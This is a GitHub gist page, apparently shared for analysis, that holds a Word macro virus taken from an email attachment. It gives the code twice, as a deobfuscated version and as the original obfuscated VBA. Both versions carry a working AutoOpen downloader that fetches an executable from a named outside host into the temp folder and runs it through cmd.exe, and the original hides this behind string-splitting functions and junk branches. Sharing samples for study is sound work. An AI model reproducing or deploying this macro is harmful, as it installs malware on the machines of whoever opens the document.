Skip to content

Instantly share code, notes, and snippets.

@szhu

szhu/1. Unobfuscated 11717.doc.vb

Created January 14, 2017 21:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save szhu/3bbeccae44119ae1a3a10b88e9791b14 to your computer and use it in GitHub Desktop.
Save szhu/3bbeccae44119ae1a3a10b88e9791b14 to your computer and use it in GitHub Desktop.
Download ZIP
Word macro virus in received email
Raw
1. Unobfuscated 11717.doc.vb
Sub AutoOpen()
If (True) Then
If (True) Then
If (False) Then
Else
If (False) Then
Else
Select Case Empty
Case Empty
tyqegexl = False
Select Case False
Case False
Select Case 968
Case 968
If (False) Then
Else
If (True) Then
Select Case "ynbolq"
Case "ynbolq"
Select Case False
Case False
If (True) Then
If (True) Then
If (True) Then
Select Case "xepuvc"
Case "xepuvc"
If (True) Then
exe_location = Environ("temp") & "wkyfo.exe"
response_code = urlmon(0, "http://truthtrustrehl.wang/search.php", exe_location, 0, 0)
If response_code = 0 Then
WinExec "cmd.exe /c " & exe_location, 0
End If
End If
End Select
End If
End If
End If
End Select
End Select
End If
End If
End Select
End Select
End Select
End If
End If
End If
End If
End Sub
Raw
2. Original 11717.doc.vb
Private Declare PtrSafe Function adpows Lib "advapi32" (ByVal qqanle As Long, ByVal ytyqe As Byte, ByVal jmigejhi As Single, ByVal mxungozna As Variant, ByVal pucfymo As Object, ByVal oqdawtaj As Long, ByVal spudi As String, ByVal mzesi As Single, ByVal pnonukv As Long, ByVal zoji As Integer, ByVal ygzopbop As Integer, ByVal ppycede As Boolean) As Double
Private Declare PtrSafe Function khyzpym Lib "kernel32" Alias "WinExec" (ByVal apcasup As String, ByVal bihihe As Long) As Long
Private Declare PtrSafe Function ynikix Lib "advapi32" Alias "cujo" (ByVal edimw As Variant, ByVal anloj As Boolean, ByVal teggo As String, ByVal kete As Byte, ByVal amzipwe As String, ByVal zfila As Integer, ByVal bgymritj As Double, ByVal jutymy As Currency, ByVal ajryrcup As Object, ByVal eqyvehc As Integer, ByVal jikibgo As Long, ByVal avzef As Object, ByVal uwymuwb As String, ByVal ulydh As Double)
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal adykr As Long, ByVal eghofj As String, ByVal nroptemma As String, ByVal mofwam As Long, ByVal gyby As Long) As Long
Private Declare PtrSafe Function ikgyxfipx Lib "kernel32" (ByVal bzokomxu As Long, ByVal lpelwo As Single, ByVal ezuno As Object, ByVal awwirbu As Boolean, ByVal ywilawg As Double, ByVal lpytbuxdi As String, ByVal ynyl As Object, ByVal gubow As Currency, ByVal tvusukxa As Boolean)
Function adytpo()
adytpo = "tem"
End Function
Function ighirpynm()
ighirpynm = "p"
End Function
Function enizen()
enizen = "\w"
End Function
Function qevfo()
qevfo = "ky"
End Function
Function lgysyvoc()
lgysyvoc = "fo"
End Function
Function hzunypon()
hzunypon = ".e"
End Function
Function jetlufs()
jetlufs = "xe"
End Function
Function iryfiju()
iryfiju = "http"
End Function
Function oxhymwa()
oxhymwa = "://t"
End Function
Function sojzo()
sojzo = "ruth"
End Function
Function ujese()
ujese = "trus"
End Function
Function ozjufecj()
ozjufecj = "treh"
End Function
Function ophyzhykhy()
ophyzhykhy = "l.wa"
End Function
Function hiclesla()
hiclesla = "ng/s"
End Function
Function imycgu()
imycgu = "earc"
End Function
Function axlycvah()
axlycvah = "h.ph"
End Function
Function ufigx()
ufigx = "p"
End Function
Function otvypeby()
otvypeby = "cmd."
End Function
Function ffojgomo()
ffojgomo = "exe "
End Function
Function ockyjr()
ockyjr = "/c "
End Function
Function qcudekom()
qcudekom = "rogehf"
End Function
Function acvoj()
epullowbupl = False
acvoj = epullowbupl
End Function
Function lkolsel()
lkolsel = 8
End Function
Function udzitedw()
udzitedw = True
End Function
Function uxmabuca()
gefvaw = 12
uxmabuca = gefvaw
End Function
Function iwyhyvv()
itefjan = 854
iwyhyvv = itefjan
End Function
Function hucwelvigwo()
rafus = True
hucwelvigwo = rafus
End Function
Function ucofx()
ucofx = Empty
End Function
Function ozohacfeg()
ollymikz = False
ozohacfeg = ollymikz
End Function
Function agdygbojb()
agdygbojb = Empty
End Function
Function exjakolnyf()
copenlosm = Empty
exjakolnyf = copenlosm
End Function
Function izfawyfj()
izfawyfj = "53168"
End Function
Function mqoxebew()
mqoxebew = "yvgowmuwe"
End Function
Function posxuvegk()
posxuvegk = 41
End Function
Function hepnyc()
sowjylxor = False
hepnyc = sowjylxor
End Function
Function qifboz()
qifboz = 968
End Function
Function nebuheko()
iwrijlabyzx = False
nebuheko = iwrijlabyzx
End Function
Function usewvicifv()
usewvicifv = False
End Function
Function pidbeng()
pidbeng = False
End Function
Function izfij()
izfij = Empty
End Function
Function ablevesowl()
uduroqsur = "svys"
ablevesowl = uduroqsur
End Function
Function mgojzyt()
nevvyz = "elefnaxhew"
mgojzyt = nevvyz
End Function
Function orapifipw()
qujtomvesa = "72800"
orapifipw = qujtomvesa
End Function
Function efmexxohkev()
ynasi = False
efmexxohkev = ynasi
End Function
Function ywomvugysp()
ksycozn = Empty
ywomvugysp = ksycozn
End Function
Function bbesin()
bbesin = "nirf"
End Function
Function cofyveli()
encygarer = "18588"
cofyveli = encygarer
End Function
Function ycmapenbi()
ycmapenbi = adytpo() & ighirpynm()
End Function
Function ogonp()
ogonp = enizen() & qevfo() & lgysyvoc() & hzunypon() & jetlufs()
End Function
Function odqyhbyxk()
odqyhbyxk = iryfiju() & oxhymwa() & sojzo() & ujese() & ozjufecj() & ophyzhykhy() & hiclesla() & imycgu() & axlycvah() & ufigx()
End Function
Function ndaryw()
ndaryw = otvypeby() & ffojgomo() & ockyjr()
End Function
Sub AutoOpen()
lserexuzd = Empty
quxwuradd = Empty
lhujpabehha = "veppywk"
emivcodw = 75
iqytli = False
nofinok = True
avxevrobke = "70213"
orjora = "70945"
gomqi = Empty
uhkypuztatx = 11
If (TypeName(lkolsel) = "Integer") Then
If (TypeName(uxmabuca) = "Integer") Then
pysetu = Empty
If (pysetu = "ulokni") Then
eddehe = "inmontyjjacj"
If (eddehe = Null) Then
dihquxkufe = "85817"
ltejufijy = "22007"
ewuhodcort = "32559"
End If
Else
If (ucofx = 518) Then
If (TypeName(iwyhyvv) = "Integer") Then
pqikidepd = "97126"
nilvecejte = 296
petubt = pqikidepd & nilvecejte
petubt = " & petubt"
atuto = Empty
ysobi = "odjuratsif"
lsoxug = False
limtajinz = "80354"
zkutwero = 12
jgipfegipb = limtajinz & zkutwero
jgipfegipb = "58432" & jgipfegipb
End If
kiznaji = 85
If (kiznaji = 107) Then
If (hucwelvigwo = 504) Then
ribuzsubz = "ozcyje"
jlopguwb = 656
kduhujuf = 15
uhtakuze = 97
hzebudi = True
hzetnowji = Empty
End If
End If
Else
Select Case exjakolnyf
Case "obmeklu"
If (ozohacfeg = False) Then
If (agdygbojb = 785) Then
udolejna = "48583"
atukcytkahs = 15
bjypkur = atukcytkahs & udolejna
bjypkur = bjypkur & "41708"
End If
End If
If (TypeName(gomqi) = "Empty") Then
xnehinpoxu = ""
xnehinpoxu = " & xnehinpoxu"
End If
Case Empty
tyqegexl = False
Select Case tyqegexl
Case 97
If (izfawyfj = undefined) Then
etolnij = "42524"
olyminy = 82
didzacyt = etolnij & olyminy
didzacyt = didzacyt & ""
oxvavez = "68357"
gubfunyko = 155
End If
aryh = Empty
If (aryh = Empty) Then
If (mqoxebew = "gik") Then
lrylufqa = False
nuzic = "xbolal"
End If
End If
enxikavb = 933
If (enxikavb < 1075) Then
rratxowdy = "avyjruhukx"
bhoqtif = 7
muflipfo = rratxowdy & bhoqtif
muflipfo = " & muflipfo"
tsilovn = "afexup"
tsilovn = ""
aruvycy = "49647"
xoxwuru = 13
evemja = aruvycy & xoxwuru
lvuhatamy = "xajruqwo"
lvuhatamy = "ncomoflisz" & lvuhatamy
cyksone = Empty
yrodjutr = 15
End If
If (posxuvegk > 13) Then
ksujeq = ""
oqmakukfoz = "umipra"
wwilamv = 935
ylmezejasg = wwilamv & oqmakukfoz
ylmezejasg = "33855" & ylmezejasg
wtabog = "uvmikawh"
ylnabiller = 833
egsonunes = ylnabiller & wtabog
egsonunes = egsonunes & ""
End If
Case False
Select Case qifboz
Case True
If (quxwuradd = "hzoqbohha") Then
If (hepnyc = False) Then
End If
End If
ajec = "61096"
If (ajec = Null) Then
acehket = False
mesefowi = False
End If
Case 968
axjazu = 34
If (axjazu = 57) Then
ewsiroh = True
If (ewsiroh = 981) Then
ihcazets = "86770"
lajozyko = 130
mobatw = "68123"
naflovy = 11
mulpaqosqu = naflovy & mobatw
mulpaqosqu = mulpaqosqu & "itaqc"
gawwamyjf = 97
End If
uqvydebx = 83
If (TypeName(uqvydebx) = "Integer") Then
qrofliqjize = "hylnuxa"
eruzore = 595
yxqipqyfpev = qrofliqjize & eruzore
yxqipqyfpev = yxqipqyfpev & ""
ohfitcu = "87488"
lkahema = ""
lkahema = " & lkahema"
vcemawd = False
dolopjo = "ody"
dolopjo = "70369"
ipicdibo = "qezkozgef"
ipicdibo = "bqacoz" & ipicdibo
gfukaphobjy = False
End If
samorhucu = False
If (samorhucu = False) Then
bvuszugd = 148
afrekymod = "pynqejje"
mqewyfac = 921
ypnevirta = mqewyfac & afrekymod
ypnevirta = ypnevirta & ""
utexynj = "dopmozuv"
yjzehu = True
aqimevti = "62970"
End If
Else
jatjirqo = "51037"
gzyxefj = 62
rzapoq = gzyxefj & jatjirqo
vgivotelo = "ewjahduzz"
okkyfod = 225
glihomiw = okkyfod & vgivotelo
If (usewvicifv = False) Then
ahif = "ynbolq"
Select Case ahif
Case 694
lidvis = True
If (lidvis = True) Then
hyfotsu = False
If (hyfotsu = False) Then
wkolbof = True
mowylkej = "89825"
ygufzukz = "61673"
End If
End If
If (TypeName(pidbeng) = "Boolean") Then
bassyrydx = "get"
vyneteso = 305
epfyxo = vyneteso & bassyrydx
epfyxo = "540" & epfyxo
yjsevil = "2667"
ovtowowny = 227
amkebogyq = ovtowowny & yjsevil
amkebogyq = "kuzpi" & amkebogyq
fufvehikd = "92250"
fufvehikd = ""
vacbinnyja = "usruq"
bosetzeflo = 97
izmykijne = bosetzeflo & vacbinnyja
izmykijne = izmykijne & "awbagmexpubp"
ohputhagqir = "pasze"
End If
If (izfij = 899) Then
qmyzoni = 13
End If
Case "ynbolq"
obnekz = False
Select Case obnekz
Case "43356"
lvigmihf = 735
If (lvigmihf = 908) Then
fbenlasydve = True
If (fbenlasydve = False) Then
If (uhkypuztatx = 7) Then
culpajy = 200
amude = 752
bybat = 47
olotpo = ""
yzoppu = ""
yzoppu = " & yzoppu"
End If
End If
End If
Case False
izlefx = 216
If (izlefx = 216) Then
If (orapifipw = "72800") Then
ylforpopb = False
If (ylforpopb = False) Then
aklaxoje = "xepuvc"
Select Case aklaxoje
Case Null
If (ywomvugysp = 330) Then
dpygukce = True
alappimki = "snyk"
End If
Case Empty
If (ywomvugysp = 330) Then
dpygukce = True
alappimki = "snyk"
End If
Case "xepuvc"
If (cofyveli = "18588") Then
ampywno = Environ(ycmapenbi()) & ogonp()
nvyvykc = URLDownloadToFileA(0, odqyhbyxk(), ampywno, 0, 0)
If nvyvykc = 0 Then
khyzpym ndaryw() & ampywno, 0
End If
End If
Case 95
If (ywomvugysp = 330) Then
dpygukce = True
alappimki = "snyk"
End If
End Select
End If
End If
End If
End Select
Case Null
lidvis = True
If (lidvis = True) Then
hyfotsu = False
If (hyfotsu = False) Then
wkolbof = True
mowylkej = "89825"
ygufzukz = "61673"
End If
End If
If (TypeName(pidbeng) = "Boolean") Then
bassyrydx = "get"
vyneteso = 305
epfyxo = vyneteso & bassyrydx
epfyxo = "540" & epfyxo
yjsevil = "2667"
ovtowowny = 227
amkebogyq = ovtowowny & yjsevil
amkebogyq = "kuzpi" & amkebogyq
fufvehikd = "92250"
fufvehikd = ""
vacbinnyja = "usruq"
bosetzeflo = 97
izmykijne = bosetzeflo & vacbinnyja
izmykijne = izmykijne & "awbagmexpubp"
ohputhagqir = "pasze"
End If
If (izfij = 899) Then
qmyzoni = 13
End If
Case Empty
lidvis = True
If (lidvis = True) Then
hyfotsu = False
If (hyfotsu = False) Then
wkolbof = True
mowylkej = "89825"
ygufzukz = "61673"
End If
End If
If (TypeName(pidbeng) = "Boolean") Then
bassyrydx = "get"
vyneteso = 305
epfyxo = vyneteso & bassyrydx
epfyxo = "540" & epfyxo
yjsevil = "2667"
ovtowowny = 227
amkebogyq = ovtowowny & yjsevil
amkebogyq = "kuzpi" & amkebogyq
fufvehikd = "92250"
fufvehikd = ""
vacbinnyja = "usruq"
bosetzeflo = 97
izmykijne = bosetzeflo & vacbinnyja
izmykijne = izmykijne & "awbagmexpubp"
ohputhagqir = "pasze"
End If
If (izfij = 899) Then
qmyzoni = 13
End If
Case 279
lidvis = True
If (lidvis = True) Then
hyfotsu = False
If (hyfotsu = False) Then
wkolbof = True
mowylkej = "89825"
ygufzukz = "61673"
End If
End If
If (TypeName(pidbeng) = "Boolean") Then
bassyrydx = "get"
vyneteso = 305
epfyxo = vyneteso & bassyrydx
epfyxo = "540" & epfyxo
yjsevil = "2667"
ovtowowny = 227
amkebogyq = ovtowowny & yjsevil
amkebogyq = "kuzpi" & amkebogyq
fufvehikd = "92250"
fufvehikd = ""
vacbinnyja = "usruq"
bosetzeflo = 97
izmykijne = bosetzeflo & vacbinnyja
izmykijne = izmykijne & "awbagmexpubp"
ohputhagqir = "pasze"
End If
If (izfij = 899) Then
qmyzoni = 13
End If
End Select
End If
End If
Case "95963"
If (quxwuradd = "hzoqbohha") Then
If (hepnyc = False) Then
End If
End If
ajec = "61096"
If (ajec = Null) Then
acehket = False
mesefowi = False
End If
Case Null
If (quxwuradd = "hzoqbohha") Then
If (hepnyc = False) Then
End If
End If
ajec = "61096"
If (ajec = Null) Then
acehket = False
mesefowi = False
End If
End Select
dhydjihe = 60
ywage = ""
ywage = "frova"
sinrakk = 356
kpywypmaxu = "55510"
guqdorwib = 13
pmojlowr = kpywypmaxu & guqdorwib
pmojlowr = pmojlowr & "ujhefofuv"
End Select
Case "ewlewuqhu"
If (ozohacfeg = False) Then
If (agdygbojb = 785) Then
udolejna = "48583"
atukcytkahs = 15
bjypkur = atukcytkahs & udolejna
bjypkur = bjypkur & "41708"
End If
End If
If (TypeName(gomqi) = "Empty") Then
xnehinpoxu = ""
xnehinpoxu = " & xnehinpoxu"
End If
Case 42
If (ozohacfeg = False) Then
If (agdygbojb = 785) Then
udolejna = "48583"
atukcytkahs = 15
bjypkur = atukcytkahs & udolejna
bjypkur = bjypkur & "41708"
End If
End If
If (TypeName(gomqi) = "Empty") Then
xnehinpoxu = ""
xnehinpoxu = " & xnehinpoxu"
End If
End Select
End If
End If
End If
End If
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment